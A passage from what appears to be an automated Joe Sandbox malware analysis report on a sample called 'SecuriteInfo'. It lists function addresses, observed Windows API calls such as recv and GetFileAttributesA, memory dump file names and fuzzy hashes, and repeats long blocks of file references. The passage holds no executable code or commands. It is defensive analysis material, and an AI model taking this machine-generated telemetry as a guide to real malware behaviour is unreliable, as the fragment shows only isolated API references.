                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                        • Opcode ID: 563d61e3b81832be8f54a132ea9be34bcd874b4b353203e141661743c4fc77b2
                                                                                                                                                                                                                                        • Instruction ID: 903ee7092bbe6cbeb28ae469f77b3c93c96a3740bdaef41d434402293b7c5278
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 563d61e3b81832be8f54a132ea9be34bcd874b4b353203e141661743c4fc77b2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3C08C30022E0807EE2C3D78088C8A83380AB8B3A46D81BC4E0715B0F2DA36980BE750
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B88280 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?), ref: 00B88289
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                        • Opcode ID: e27a71042fb7cbb15e331222ab08299eb21c890f82464cf23debb2eb21805089
                                                                                                                                                                                                                                        • Instruction ID: 4be5faf61b92237fd1e6112988b17de99bf2b45be8556410e609ed6cf49640b2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e27a71042fb7cbb15e331222ab08299eb21c890f82464cf23debb2eb21805089
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CC08C30022E0847EA2C7E68588C8343340EB473283E80BC8E0325B0F2DB33C807CBA0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00B8A9D0 Relevance: 1.5, APIs: 1, Instructions: 244COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00B8ABF8
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140902356.0000000000E7F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140930718.0000000000E8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140958082.0000000000E8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_b80000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                        • Opcode ID: ca7f5d678511776f2e038c389df875125d663074ae142914cbfd690c27d5d3eb
                                                                                                                                                                                                                                        • Instruction ID: 6a4c07dfffa2f1c8c40265fee54bf2db28be116f8eacc49c574319f42934271a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca7f5d678511776f2e038c389df875125d663074ae142914cbfd690c27d5d3eb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4B10570A10268DFEB28DF18CD94BDEB7B5EF05304F5041D9E409A7291D775AA84CF91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 051F0CC8 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2144281346.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 45272bfe9e112c390ef0c5d878832319df250121f1e44b3615d8dc8562ff36ca
                                                                                                                                                                                                                                        • Instruction ID: 1ab435cac4e4a114c5e6a7e9eb1b4069d888f81e6b531c51c29e63bd7536acfd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45272bfe9e112c390ef0c5d878832319df250121f1e44b3615d8dc8562ff36ca
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 02F0BBDF048115AD511AC1966B5C6B56F2F669F3307328166F707E614397851749A330
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 051F0D36 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2144281346.00000000051F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 051F0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_51f0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d2c15636fb2f561ffc8cb2116b822bea948b195a12be5dd8336ac0ab55e57497
                                                                                                                                                                                                                                        • Instruction ID: a321abe17f012fe8cc7db031a58f2d1f13fa13b8ad1d2ddc27a4aeaf0c0d009e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c15636fb2f561ffc8cb2116b822bea948b195a12be5dd8336ac0ab55e57497
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2F082DF08C121AC612AC1822B6C6B6AB2FB2DF3307728623F70B91047A795174D6235
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 00B8D8D0 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • recv.WS2_32(?,?,00000004,00000000), ref: 00B8D91B
                                                                                                                                                                                                                                        • recv.WS2_32(?,?,00000008,00000000), ref: 00B8D950
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139275672.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139306429.0000000000BE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139397496.0000000000BE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139439197.0000000000BEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139472825.0000000000BF5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139502103.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139530751.0000000000BF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139641535.0000000000D51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139672073.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139705017.0000000000D62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139739567.0000000000D63000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139776155.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139948652.0000000000D78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2139999844.0000000000D79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140027266.0000000000D82000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140054395.0000000000D89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140085216.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140113187.0000000000D9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140140001.0000000000DA0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140172034.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140204910.0000000000DCF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140231009.0000000000DD0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140258468.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140285813.0000000000DD6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140315634.0000000000DD7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140343263.0000000000DDF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140424909.0000000000DE0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140455657.0000000000DE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140486195.0000000000DEA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140525090.0000000000DEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140564438.0000000000DF7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140592050.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140619769.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140646325.0000000000E00000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140679440.0000000000E0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140707413.0000000000E43000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140781304.0000000000E76000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140814517.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140846130.0000000000E78000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2140874259.0000000000E7D000.00000040.00000001.01000000.00000003.sdmpDownload File
